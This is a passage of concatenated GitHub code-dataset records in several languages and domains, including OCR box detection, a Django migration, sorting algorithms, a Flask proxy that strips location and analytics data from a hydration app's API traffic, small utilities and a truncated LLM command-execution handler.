volume\n# then initialize our set of bounding box rectangles and corresponding confidence scores\n(numRows, numCols) = scores.shape[2:4]\nrects = []\nconfidences = []\n\n# loop over the number of rows\nfor y in range(0, numRows):\n # extract the scores (probabilities), \n # followed by the geometrical data used to derive \n # potential bounding box coordinates that surround text\n scoresData = scores[0, 0, y]\n xData0 = geometry[0, 0, y]\n xData1 = geometry[0, 1, y]\n xData2 = geometry[0, 2, y]\n xData3 = geometry[0, 3, y]\n anglesData = geometry[0, 4, y]\n \n # loop over the number of columns\n for x in range(0, numCols):\n # if our score does not have sufficient probability, ignore it\n if scoresData[x] < args[\"min_confidence\"]:\n continue\n \n # compute the offset factor as our resulting feature maps will be 4x smaller than the input image\n (offsetX, offsetY) = (x * 4.0, y * 4.0)\n \n # extract the rotation angle for the prediction and then compute the sin and cosine\n angle = anglesData[x]\n cos = np.cos(angle)\n sin = np.sin(angle)\n \n # use the geometry volume to derive the width and height of the bounding box\n h = xData0[x] + xData2[x]\n w = xData1[x] + xData3[x]\n \n # compute both the starting and ending (x, y)-coordinates for the text prediction bounding box\n endX = int(offsetX + (cos * xData1[x]) + (sin * xData2[x]))\n endY = int(offsetY - (sin * xData1[x]) + (cos * xData2[x]))\n startX = int(endX - w)\n startY = int(endY - h)\n \n # add the bounding box coordinates and probability score to our respective lists\n rects.append((startX, startY, endX, endY))\n confidences.append(scoresData[x])\n \n# Finally we need to apply a `non-maxima suppression` to the bounding boxes\n# This will help us to remove overlapping bounding boxes\n# Read more here: https://pyimagesearch.com/2014/11/17/non-maximum-suppression-object-detection-python/\nboxes = non_max_suppression(np.array(rects), probs=confidences)\n\n\n# loop over the bounding boxes\nfor (startX, startY, endX, endY) in boxes:\n # scale the bounding box coordinates based on the respective ratios\n startX = int(startX * rW)\n startY = int(startY * rH)\n endX = int(endX * rW)\n endY = int(endY * rH)\n \n # HERE IS WHERE WE NEED TO DETERMINE HOW TO EXTRACT THE ACTUAL CONTENTS OF THE TEXT\n # I think we can use the bounding box coordinates to crop the image and then use OCR to extract the text\n \n # draw the bounding box on the image\n cv2.rectangle(orig, (startX, startY), (endX, endY), (0, 255, 0), 2)\n # crop the image based on startX, startY, endX, endY and then use OCR to extract the text\n cv2.imshow(\"cropped\", orig[startY:endY, startX:endX])\n \n \n'''\n THINGS TO DO:\n HELPFUL GUIDES:\n OpenCV: https://pyimagesearch.com/2018/08/20/opencv-text-detection-east-text-detector/\n PyTesseract: https://www.pyimagesearch.com/2017/07/10/using-tesseract-ocr-python/\n \n 1. Use the coordinates of the bounding box to crop the image and then use OCR to extract the text\n 2. Store the coordinates of the bounding box and the text in a tuple\n 3. Store the tuple in a list\n 4. Eventually we will need to store the data in a json file.\n 5. Far down the line we'll use the coordinates of each text and the contents of the text to determine what part of the receipt is what.\n 6. Then, we'll have a JSON file that contains each part of the receipt.\n'''","repo_name":"bbluecircles/Receipt-Reader","sub_path":"text_detection.py","file_name":"text_detection.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3236092733","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('backbone', '0842_sensorthreshold_create_user'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='sensorthresholdaction',\n name='create_user',\n field=models.ForeignKey(related_name='sensor_threshold_action_create_user', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"walong365/icsw","sub_path":"initat/cluster/backbone/migrations/0843_sensorthresholdaction_create_user.py","file_name":"0843_sensorthresholdaction_create_user.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35857254763","text":"import time\nimport gc\nimport os\nimport struct\nimport board\nimport gifio\nimport digitalio\n\n# Get a dictionary of GIF filenames at the passed base directory\ndef get_files(base):\n allfiles = os.listdir(base)\n file_names = []\n for _, filetext in enumerate(allfiles):\n if not filetext.startswith(\".\"):\n if filetext not in ('boot_out.txt', 'System Volume Information'):\n if filetext.endswith(\".gif\"):\n file_names.append(filetext)\n return file_names\n\n# Set BOOT button on ESP32-S2 Feather TFT to advance to next GIF\nbutton = digitalio.DigitalInOut(board.BUTTON)\nbutton.switch_to_input(pull=digitalio.Pull.UP)\n\ndisplay = board.DISPLAY\ndisplay.auto_refresh = False\n\nCOL_OFFSET = 40 # The Feather TFT needs to have the display\nROW_OFFSET = 53 # offset by these values for direct writes\n\nfiles = get_files(\"/\")\nfor i in range(len(files)):\n\n odg = gifio.OnDiskGif(files[i])\n # Skip PyPortal GIFs if put on ESP32-S2 Feather TFT\n if odg.width != board.DISPLAY.width:\n print(\"File \"+files[i]+\" not right width, skipping\\n\")\n continue\n\n start = time.monotonic()\n next_delay = odg.next_frame() # Load the first frame\n end = time.monotonic()\n call_delay = end - start\n\n # Display GIF file frames until screen touched (for PyPortal)\n while True:\n sleeptime = max(0, next_delay - call_delay)\n time.sleep(sleeptime)\n # If the BOOT button is pressed, advance to next GIF file\n if button.value is False:\n print(\"Button Press, Advance\\n\")\n break\n next_delay = odg.next_frame()\n display.bus.send(42, struct.pack(\">hh\", COL_OFFSET,\n odg.bitmap.width - 1 + COL_OFFSET))\n display.bus.send(43, struct.pack(\">hh\", ROW_OFFSET,\n odg.bitmap.height - 1 + ROW_OFFSET))\n display.bus.send(44, odg.bitmap)\n # End while\n # Clean up memory\n odg.deinit()\n odg = None\n gc.collect()\n# End for\n","repo_name":"adafruit/Adafruit_Learning_System_Guides","sub_path":"CircuitPython_gifio/Feather/code-multi-feather-direct.py","file_name":"code-multi-feather-direct.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":913,"dataset":"github-code","pt":"5"} +{"seq_id":"26373551978","text":"#import os\r\n\r\n#print(os.getcwd())\r\n\r\nimport Phones\r\nimport Phones.Sounds\r\n#import Phones.G3 #Only import G3 file from Phones package\r\n#from Phones import G3 #Same as above statment\r\n\r\nPhones.Pots()\r\nPhones.G3_phone()\r\nPhones.Isdn()\r\nPhones.Sounds.Big_Bang()\r\n#G3.G3_phone() #File functions called this way using the from import line\r\n\r\n\r\n#with open('Text.txt') as f:\r\n #for line in f:\r\n #print(line)\r\n\r\n#f = open('Text.txt', 'r+')\r\n#read_line = f.readline()\r\n#print(read_line)\r\n#value = ('Sonic speed', 42069)\r\n#s = str(value)\r\n#f = open('Text.txt', 'w')\r\n#f.seek(5)\r\n#print(f.write(s))\r\n#print(f.read())\r\n#f.close()\r\n\r\nimport json\r\nprint(json.dumps([1, 'simple', 'list']))\r\nf = open('Tism.txt', 'r+')\r\nx = (2, 'simple', 'list')\r\ndeserialized = json.dumps(x)\r\nq = json.loads(deserialized)\r\nprint(q)\r\n#data = json.dump(x, f)\r\nd_data = json.load(f)\r\nprint(d_data)\r\nf.close()\r\n","repo_name":"AlexanderGruhl/Python3-ROSPY","sub_path":"Practice Programs/Phone/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"69803307031","text":"# Алгоритм Бинарного Поиска/Binar Search Algoritm(B.S.A.)\n\ndef binary_search(list, item):\n low = 0 # <== Начало массива\n high = len(list) - 1 # <== # <== Конец массива\n\n while low <= high:\n mid = (low + high) // 2\n guess = list[mid]\n if guess == item: # <== Если То что ищем равно Среднему\n return mid\n if guess > item: # <== Если То что ищем меньше Среднего\n high = mid - 1\n else: # <== Если То что ищем меньше Среднего\n low = mid + 1\n return None\n\n# Алгоритм Быстрой Сортировки/Quick Sort Algoritm(Q.S.A.)\n\ndef quicksort(array):\n if len(array) < 2:\n return array\n else:\n start_point = array[0] # <== старт с 1 символа\n less = [i for i in array[1:] if i <= start_point] # <== Перенос влево если меньше чем Старт \n greater = [i for i in array[1:] if i > start_point] # <== Перенос вправо если больше чем Старт\n return quicksort(less) + [start_point] + quicksort(greater) # <== Возвращаем в массив отсортированных соседей\n \n\n# Алгоритм Сортировки Слиянием/Merge Sort Algoritm(M.S.A.)\n\ndef mergesort(array): \n if len(array) > 1: \n mid = len(array)//2\n left = array[:mid] \n right = array[mid:]\n mergesort(left) \n mergesort(right) \n\n i = j = k = 0\n\n while i < len(left) and j < len(right): \n if left[i] < right[j]: \n array[k] = left[i] \n i += 1\n else: \n array[k] = right[j] \n j += 1\n k += 1\n\n while i < len(left): \n array[k] = left[i] \n i += 1\n k += 1\n\n while j < len(right): \n array[k] = right[j] \n j += 1\n k += 1\n\n# Алгоритм Кнута-Морриса-Пратта (КМП-алгоритм)/KMP Algorithm\n\ndef KMPalgorithm(text, word):\n pi = [0]*len(word) # <-- Максимальная совпадающая ДЛИНА суфикса, относительно i-го элемента образа\n i = 1\n j = 0 \n while i < len(word):\n if word[j] == word[i]: # сравнение элемента из слова с эл из текста(счетчик)\n pi[i] = j+1 # если да то прибавляем единицу в массив и увеличиваем i и j\n i += 1\n j += 1\n else: # если нет то сравниваем j с 0 если да то начинаем отчет заново\n if j == 0: \n pi[i] = 0\n i += 1\n else:\n j = pi[j-1] # иначе возвращаемся в предыдущий элемент в слове\n\n print(f'Максимальная длина суффикса - {max(pi)}')\n\n message = len(word)\n message_text = len(text)\n\n i = 0\n j = 0\n while i < message_text:\n if text[i] == word[j]:\n i += 1\n j += 1\n if j == message:\n print(f'Слово/элемент ({word}) найдено')\n break\n else:\n if j > 0:\n j = pi[j-1]\n else:\n i += 1\n\n if i == message_text and j != message:\n print(f'Слово/элемент ({word}) не найдено')\n\n\n\n\n\n\n","repo_name":"L0GIN0UT/Python_semiar_lectures","sub_path":"Algorithm_sort/Alg.py","file_name":"Alg.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43822769788","text":"import json\nimport os\nimport time\nimport urllib.parse\n\nfrom flask import Flask, request\n\nimport requests\n\n\napp = Flask(__name__)\napp.config.from_object('config')\nos.makedirs(app.config['LOG_PATH'])\n\n\n@app.route('/', methods=app.config['HTTP_METHODS'])\ndef default():\n return 'success {}'.format(request.method)\n\n\ndef sanitize_headers(all_headers):\n headers = {}\n for key in (\n 'X-Parse-Application-Id',\n 'X-Parse-Rest-Api-Key',\n 'X-Parse-App-Build-Version',\n 'X-Parse-App-Display-Version',\n 'X-Parse-Os-Version',\n 'X-Parse-Installation-Id',\n 'X-Parse-Client-Key',\n 'X-Parse-Session-Token',\n 'Content-Length',\n 'Content-Type',\n 'User-Agent',\n ):\n if key in all_headers:\n headers[key] = all_headers[key]\n\n return headers\n\n\ndef sanitize_data(all_data):\n if isinstance(all_data, str):\n return all_data\n elif isinstance(all_data, bytes):\n return all_data.decode()\n elif not all_data:\n return ''\n else:\n return json.dumps(all_data)\n\n\ndef call_api(headers=None, data=None):\n t = int(time.time() * 1000)\n\n if headers is None:\n headers = request.headers\n\n if data is None:\n data = request.data\n\n method = request.method\n headers = sanitize_headers(headers)\n data = sanitize_data(data)\n\n complete_path = request.path\n if request.args:\n complete_path += '?' + urllib.parse.urlencode(request.args)\n\n resp = getattr(requests, method.lower())(\n app.config['BASE_URL'] + complete_path,\n headers=headers,\n data=data,\n )\n\n if app.config['LOG_REQUESTS']:\n with open(os.path.join(app.config['LOG_PATH'], str(t)), 'w') as f:\n f.write(json.dumps({\n 'method': method,\n 'path': complete_path,\n 'headers': headers,\n 'data': json.loads(data) if data else '',\n 'content': json.loads(resp.text),\n 'code': resp.status_code,\n }, indent=4))\n\n return resp.text, resp.status_code\n\n\n@app.route('/parse/classes/Bottle/', methods=app.config['HTTP_METHODS'])\ndef classes_Bottle(id):\n try:\n data = json.loads(request.data)\n except json.decoder.JSONDecodeError:\n data = {}\n\n if isinstance(data.get('location'), dict):\n data['location']['latitude'] = 0\n data['location']['longitude'] = 0\n\n return call_api(data=data)\n\n\n@app.route('/parse/classes/Day/', methods=app.config['HTTP_METHODS'])\ndef classes_Day(id):\n try:\n data = json.loads(request.data)\n except json.decoder.JSONDecodeError:\n data = {}\n\n if isinstance(data, dict):\n data['altitude'] = 0\n data['isLocationUsed'] = False\n data['humidity'] = 0\n data['rank'] = 0\n if 'location' in data:\n del data['location']\n\n return call_api(data=data)\n\n\n@app.route('/parse/config', methods=app.config['HTTP_METHODS'])\ndef config():\n content, code = call_api()\n\n try:\n content = json.loads(content)\n except json.decoder.JSONDecodeError:\n pass\n else:\n if isinstance(content.get('params'), dict):\n content['params'].update(**{\n 'downloadAppUrl': False,\n 'androidPregnancySettings': False,\n 'trophyShareUrl': False,\n 'trophySign': False,\n 'hidePro': False,\n })\n content = json.dumps(content)\n\n return content, code\n\n\n@app.route('/parse/classes/_Installation', methods=app.config['HTTP_METHODS'])\ndef classes_Installation_Main():\n try:\n data = json.loads(request.data)\n except json.decoder.JSONDecodeError:\n data = {}\n\n if isinstance(data, dict):\n data['deviceType'] = 'a'\n data['appVersion'] = 'a'\n data['deviceToken'] = 'a'\n\n return call_api(data=data)\n\n\n@app.route('/parse/classes/_Installation/', methods=app.config['HTTP_METHODS'])\ndef classes_Installation(id):\n try:\n data = json.loads(request.data)\n except json.decoder.JSONDecodeError:\n data = {}\n\n if isinstance(data, dict):\n data['deviceType'] = 'a'\n data['deviceName'] = 'a'\n data['deviceToken'] = 'a'\n\n return call_api(data=data)\n\n\n@app.route('/parse/classes/Location', methods=app.config['HTTP_METHODS'])\ndef classes_Location():\n try:\n data = json.loads(request.data)\n except json.decoder.JSONDecodeError:\n data = {}\n\n if isinstance(data, dict):\n data['altitude'] = 0\n if isinstance(data.get('point'), dict):\n data['latitude'] = 0\n data['longitude'] = 0\n\n return call_api(data=data)\n\n\n@app.route('/parse/', methods=app.config['HTTP_METHODS'])\ndef parse(path):\n BLOCKED = (\n 'functions/trophyanalytics',\n 'events/AppOpened',\n 'events/setManualGoal',\n 'events/viewPreviousDay',\n 'events/previousDay',\n 'events/logout',\n 'events/unpairBottle',\n 'events/addBottle',\n 'functions/getusergroups',\n 'functions/getmychallenges',\n 'functions/getmyawards',\n 'functions/getmyfriends',\n 'functions/getuserads',\n 'functions/getjoinablechallenges',\n 'functions/getclosedchallenges',\n 'functions/getchallengedetail',\n )\n\n if path in BLOCKED:\n return json.dumps({'result': []}), 202\n\n return call_api()\n","repo_name":"Ninjaclasher/hidrateapp-server","sub_path":"mitm/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5458,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"73243963351","text":"import unittest\nfrom datetime import datetime\n\nfrom turbotools.date import datetime_to_str\nfrom turbotools.date import datetime_transfer\n\n\nclass DateTest(unittest.TestCase):\n def setUp(self):\n self.now_time = datetime.now()\n self.range_count = 10\n\n def test_datetime_to_str(self):\n data = datetime_to_str({'now': self.now_time}, 'now')\n self.assertEqual(isinstance(data['now'], str), True)\n\n def test_datetime_transfer(self):\n data_list = [{'time': self.now_time, 'now': self.now_time} for _ in range(self.range_count)]\n data = datetime_transfer(data_list, ['time', 'now'])\n for now_time in data:\n self.assertEqual(isinstance(now_time['time'], str), True)\n self.assertEqual(isinstance(now_time['now'], str), True)\n","repo_name":"aansheng/turbotools","sub_path":"tests/test_date.py","file_name":"test_date.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"20095366452","text":"\"\"\"Abstract class for models of Isolates.\"\"\"\n\nfrom microbepy.common import constants as cn\nfrom microbepy.common import util\n\nimport pandas as pd\nimport numpy as np\n\nISPERMITTEDROW = lambda r: True\n\nALPHA_AVG = \"alpha_avg\"\nALPHA_STD = \"alpha_std\"\nBETA_AVG = \"beta_avg\"\nBETA_STD = \"beta_std\"\nGAMMA_AVG = \"gamma_avg\"\nGAMMA_STD = \"gamma_std\"\nGAMMA = \"gamma\"\nALPHA = \"alpha\"\n\n\nclass IsolateModel(object):\n \"\"\"\n Abstract class.\n Interface used with CrossValidation. Represents a model that\n does a single estimate. The IsolateModel is responsible\n for accessing its own data.\n Key concepts:\n key_names - names of columns that constitute a key for models\n key_values - values for a key\n isIndex - a function of an int that returns a bool\n This is used to select data subsets for estimation\n and prediction\n Note that there are separate methods for estimate and predict\n since different subsets of data may be used to estimate\n parameters vs. predict values of dependent variables.\n \"\"\"\n # Dictionary of dataframes keyed by RATE, YIELD\n # cn.KEY_ISOLATE_DVH, cn.KEY_ISOLATE_MMP, cn.LINE,\n # cn.KEY_CULTURE, cn.DEPVAR\n dfs_coculture = {}\n # Dictionary of dataframes for ancestral pairings. Keyed by RATE, YIELD\n # cn.KEY_ISOLATE, cn.cn.AVG, cn.cn.STD\n dfs_ancestral = {}\n\n def __init__(self, key_values, isPermittedRow=ISPERMITTEDROW,\n **kwargs):\n \"\"\"\n :param object model_id: identifies the model to construct\n \"\"\"\n pass\n\n @classmethod\n def _getData(cls):\n cls._makeCocultureDFS()\n cls._makeAncestralDFS()\n\n @classmethod\n def resetDFS(cls):\n cls.dfs_coculture = {}\n cls.dfs_ancestral = {}\n\n def getDataSize(self):\n \"\"\"\n Provides the number of data elements\n :return int:\n \"\"\"\n raise RuntimeError(\"Must override!\")\n\n @classmethod\n def makeCultureIsolateDF(cls, cocultures=None):\n \"\"\"\n Creates a dataframe with the DVH and MMP isolates for the cocultures.\n :param list-of-str cocultures:\n :return pd.DataFrame: KEY_CULTURE, KEY_ISOLATE_DVH, KEY_ISOLATE_MMP\n \"\"\"\n df = cls._makeCocultureDFS()[cn.RATE]\n if cocultures is None:\n cocultures = df[cn.KEY_CULTURE].tolist()\n df_result = pd.DataFrame([r for _,r in df.iterrows()\n if r[cn.KEY_CULTURE] in cocultures])\n df_result = df_result[[cn.KEY_CULTURE, cn.KEY_ISOLATE_DVH,\n cn.KEY_ISOLATE_MMP]].copy()\n return df_result\n \n\n @classmethod\n def _makeAncestralDFS(cls):\n \"\"\"\n Computes values in ancestral pairings.\n Creates dict-of-pd.DataFrame: keyed by cn.RATE, cn.YIELD. Columns:\n cn.KEY_ISOLATE (INDEX)\n cn.AVG\n cn.STD - standard deviation of the average\n \"\"\"\n # TODO: Change when change from WT to AN\n anpat = \"%s%%\" % cn.LINE_AN # Avoid python interpreting '%'\n def makeDF(depvar):\n query = '''\n select distinct key_isolate,\n key_culture as key_culture_ev, key_isolate_an, %s\n from %s,\n (select distinct key_isolate as key_isolate_an, \n key_culture as key_culture_wt from %s) sub\n where key_culture_ev = key_culture_wt\n and key_isolate not like (\"%s\")\n \tand key_isolate_an like(\"%s\")\n order by key_isolate, key_isolate_an\n ''' % (depvar, cn.TABLE_CULTURE_ISOLATE_MUTATION,\n cn.TABLE_CULTURE_ISOLATE_MUTATION, anpat, anpat)\n df = util.readSQL(query)\n df = df[[cn.KEY_ISOLATE, depvar]].drop_duplicates()\n groupby = df.groupby(cn.KEY_ISOLATE)\n result = groupby.mean()\n result.rename(columns={depvar: cn.AVG}, inplace=True)\n result[cn.STD] = groupby.std()[depvar]\n result[cn.COUNT] = groupby.count()\n result[cn.STD] = [r[cn.STD]/np.sqrt(r[cn.COUNT])\n for _,r in result.iterrows()]\n del result[cn.COUNT]\n return result\n #\n if len(cls.dfs_ancestral) == 0:\n for depvar in [cn.RATE, cn.YIELD]:\n cls.dfs_ancestral[depvar] = makeDF(depvar)\n return cls.dfs_ancestral\n\n @classmethod\n def _makeCocultureDFS(cls):\n \"\"\"\n Computes the values of the dependent variable\n Constructs a dictionary indexed by depvar with pd.DataFrame:\n cn.KEY_CULTURE\n cn.LINE\n cn.KEY_ISOLATE_DVH\n cn.KEY_ISOLATE_MMP\n cn.DEPVAR\n \"\"\"\n def makeDF(depvar):\n query = '''\n select distinct \n key_culture, line,\n key_isolate as key_isolate_dvh, \n key_isolate_mmp, \n %s\n from genotype_phenotype,\n (select distinct key_isolate as key_isolate_mmp, \n transfer as transfer_mmp,\n key_culture as key_culture_mmp from genotype_phenotype \n where species='%s' and transfer_mmp=%d) sub\n where species_mix = '%s' \n and transfer = %d\n and key_culture is not null \n and key_isolate is not null\n and species = '%s' \n and key_culture_mmp = key_culture\n ''' % (depvar, cn.SPECIES_MIX_MMP, cn.TRANSFER_1000G, \n cn.SPECIES_MIX_BOTH, cn.TRANSFER_1000G,\n cn.SPECIES_MIX_DVH)\n df = util.readSQL(query)\n df.rename(columns={depvar: cn.DEPVAR}, inplace=True)\n return df\n #\n if len(cls.dfs_coculture) == 0:\n for depvar in [cn.RATE, cn.YIELD]:\n cls.dfs_coculture[depvar] = makeDF(depvar)\n return cls.dfs_coculture\n\n @classmethod\n def makeEstimateDFS(cls, cvsize=3, depvar=cn.RATE,\n isPermittedRow=ISPERMITTEDROW):\n \"\"\"\n :param int cvsize: size of the cross validation set\n :param str depvar: dependent variable\n :param function isPermittedRow: True if row is permitted\n allows for filtering\n :return dict: Cross validation dataframes\n \"\"\"\n cross = CrossValidation(cls, cvsize, depvar=depvar,\n isPermittedRow=isPermittedRow)\n return cross.estimate()\n\n @classmethod\n def getKeyValues(cls):\n \"\"\"\n :return list-of-str: Names of the keys for the models\n \"\"\"\n raise RuntimeError(\"Must override!\")\n\n def estimate(self, isIndex=lambda x: True, **kwargs):\n \"\"\"\n :param function isIndex:\n arg: int; returns bool\n :return pd.DataFrame: df_estimate\n key columns - those specified in getKeys \n columns - names of model parameters estimated\n \"\"\"\n raise RuntimeError(\"Must override!\")\n\n def predict(self, isIndex=lambda x: True):\n \"\"\"\n :param Function isIndex:\n :return pd.DataFrame:\n key columns - those specified in getKeys \n cn.ESTIMATE - estimated value\n OBSERVED\n \"\"\"\n raise RuntimeError(\"Must override!\")\n","repo_name":"ScienceStacks/microbepy","sub_path":"microbepy/model/isolate_model.py","file_name":"isolate_model.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23470705912","text":"import os\nimport sys\n\nimport zipfile\nfrom zipfile import ZipFile\n\nimport shutil\n\nclass Zip():\n\t\n\tdef __init__(self):\n\t\t\n\t\tself.nameFolder = 'ZIP/'\n\t\tself.nameZipFile = None\n\t\tself.thisfile = None\n\n\tdef Saludar(self):\n\t\tprint(self.phrase)\n\n\tdef CreateFile(self, task):\n\t\tself.nameZipFile = self.nameFolder + 'Task' + str(task) + '.zip'\n\t\t\n\t\tself.thisfile = ZipFile(self.nameZipFile, 'a', zipfile.ZIP_DEFLATED)\n\t\t\n\t\tsrc_files = os.listdir('/tmp/')\n\t\t\n\t\tsrc_files_jpg = list()\n\t\n\t\tfor i in range(len(src_files)):\n\t\t\tif src_files[i].startswith('image_' + str(task) + '_') and src_files[i].endswith('.jpg'):\n\t\t\t\tsrc_files_jpg.append(src_files[i])\n\t\t\t\t\n\t\tsrc_files_order_jpg = sorted(src_files_jpg)\n\t\t\n\t\tfor i in range(len(src_files_order_jpg)):\n\t\t\tcheckFile = os.path.isfile('/tmp/' + src_files_order_jpg[i])\n\t\t\tif checkFile == True:\n\t\t\t\tshutil.copy('/tmp/' + src_files_order_jpg[i], self.nameFolder)\n\t\t\t\tself.thisfile.write(self.nameFolder + src_files_order_jpg[i])\n\t\t\t\tos.remove(self.nameFolder + src_files_order_jpg[i])\t\t\n\n\t\tself.thisfile.close()\n","repo_name":"juanen1602/API_Camera_DMK","sub_path":"ZIP/dwlZip.py","file_name":"dwlZip.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20299061322","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"ipetrash\"\n\n\ndef hex2str(hex_string: str, encoding=\"utf-8\") -> str:\n data = bytes.fromhex(hex_string)\n return str(data, encoding)\n\n\ndef str2hex(text: str, encoding=\"utf-8\", upper=True) -> str:\n hex_text = bytes(text, encoding).hex()\n if upper:\n hex_text = hex_text.upper()\n\n return hex_text\n\n\nif __name__ == \"__main__\":\n assert hex2str(\"504F53542068747470733A\") == \"POST https:\"\n assert str2hex(hex2str(\"504F53542068747470733A\")) == \"504F53542068747470733A\"\n assert (\n str2hex(hex2str(\"504F53542068747470733A\"), upper=False)\n == \"504f53542068747470733a\"\n )\n assert str2hex(\"POST https:\") == \"504F53542068747470733A\"\n assert hex2str(str2hex(\"POST https:\")) == \"POST https:\"\n assert hex2str(str2hex(\"Привет мир!\")) == \"Привет мир!\"\n assert hex2str(str2hex(\"⌚⏰☀☁☔☺\")) == \"⌚⏰☀☁☔☺\"\n\n hex_text = \"504F53542068747470733A\"\n text = hex2str(hex_text)\n print(f'\"{text}\"')\n\n text = \"POST https:\"\n hex_text = str2hex(text)\n print(hex_text)\n","repo_name":"gil9red/SimplePyScripts","sub_path":"hex2str/hex2str.py","file_name":"hex2str.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"5"} +{"seq_id":"11577949513","text":"class NameNotFound(Exception):\r\n def __init__(self, msg=\"Name not found\"):\r\n Exception.__init__(self, msg)\r\n\r\n\r\ntry:\r\n names = [\"Sachin\", \"Saurav\", \"Rahul\"]\r\n name = input(\"Enter name: \")\r\n if name not in names:\r\n raise NameNotFound\r\n print(\"Welcome \" + name)\r\nexcept NameNotFound as e:\r\n print(e)\r\n","repo_name":"shubh4197/Python","sub_path":"PycharmProjects/day4/program3.py","file_name":"program3.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20293993362","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"ipetrash\"\n\n\n# SOURCE: https://github.com/mozilla/bleach\n# SOURCE: https://bleach.readthedocs.io/en/latest/linkify.html#using-bleach-linkifier-linkifyfilter\n\n\nfrom functools import partial\n\n# pip install bleach\nfrom bleach import Cleaner\nfrom bleach.linkifier import LinkifyFilter\n\n\nhtml = \"
http://example.com
\"\n\ncleaner = Cleaner(tags=[\"pre\"])\nprint(cleaner.clean(html))\n#
http://example.com
\n\ncleaner = Cleaner(tags=[\"pre\"], filters=[LinkifyFilter])\nprint(cleaner.clean(html))\n#
http://example.com
\n\nprint(\"\\n\" + \"-\" * 100 + \"\\n\")\n\n# skip_tags (list) – list of tags that you don’t want to linkify\n# the contents of; for example, you could set this to ['pre']\n# to skip linkifying contents of pre tags\ncleaner = Cleaner(\n tags=[\"pre\"],\n filters=[\n partial(LinkifyFilter, skip_tags=[\"pre\"]),\n ]\n)\nprint(cleaner.clean(html))\n#
http://example.com
\n","repo_name":"gil9red/SimplePyScripts","sub_path":"bleach__examples__remove_tags__clear_html/class_LinkifyFilter.py","file_name":"class_LinkifyFilter.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"5"} +{"seq_id":"4214921863","text":"from flask import Flask, render_template, redirect, session, flash, request\nimport random\n\napp = Flask(__name__)\napp.secret_key = 'idontno'\n\n@app.route('/')\ndef index():\n if 'gold' not in session:\n session['gold'] = 0\n session['status'] = \"The ninja has gone nowhere so far.\"\n return render_template('index.html')\n\n@app.route('/process', methods=['POST'])\ndef process():\n if request.form['select_it'] == 'Farm': \n session['amount'] = random.randrange(10, 21) \n session['gold'] += session['amount']\n session['status'] += \" You got the ninja \" + str(session['amount']) + \" pieces of gold.\"\n return redirect('/')\n elif request.form['select_it'] == 'Cave': \n session['amount'] = random.randrange(5, 11)\n session['gold'] += session['amount']\n session['status'] += \" You got the ninja \" + str(session['amount']) + \" pieces of gold.\"\n return redirect('/')\n elif request.form['select_it'] == 'House': \n session['amount'] = random.randrange(2, 5)\n session['gold'] += session['amount']\n session['status'] += \" The ninja commit a B&E and stole \" + str(session['amount']) + \" pieces of gold... killing \" + str(random.randrange(1, 11)) + \" in the process.\"\n return redirect('/')\n elif request.form['select_it'] == 'Casino': \n session['amount'] = random.randrange(0, 51)\n session['gold'] += session['amount']\n session['status'] += \" You got the ninja \" + str(session['amount']) + \" pieces of gold.\"\n return redirect('/')\n \n return render_template('index.html')\n \n@app.route('/reset', methods=[\"POST\"]) \ndef reset():\n if request.form['reset_it'] == 'zero_it':\n session.pop('gold')\n session.pop('status')\n return redirect('/')\n\napp.run(debug=True)\n","repo_name":"rockomatthews/Dojo","sub_path":"Python/Flask_Fundamentals/ninjaGold/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73836863832","text":"import os\nimport re\nimport yaml\nimport shlex\nimport subprocess\nimport logging\nfrom subprocess import check_output\nfrom typing import List, Tuple\nfrom src.handlers.handler import Handler\nfrom src.container_config import container\nfrom src.config_manager import ConfigManager\nfrom src.handlers.quokka_loki import QuokkaLoki\nfrom src.handlers.handler_utils import get_base_path, execute_script\n\n\n\nclass CommandExecutionHandler(Handler): \n functDef = {\n \"name\": \"execute_command\",\n \"description\": \"execute a OS command in a given location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"command\": {\n \"type\": \"string\",\n \"description\": \"the command to be executed - assumes linux bash\",\n },\n \"working_directory\": {\"type\": \"string\", \n \"description\": \"the working directory relative to the home folder that the command will execute in \",},\n },\n \"required\": [\"command\", \"working_directory\"],\n },\n }\n \n def get_function_calling_definition(self):\n return self.functDef\n \n\n def handle(self, action: dict, account_name:str = \"auto\") -> 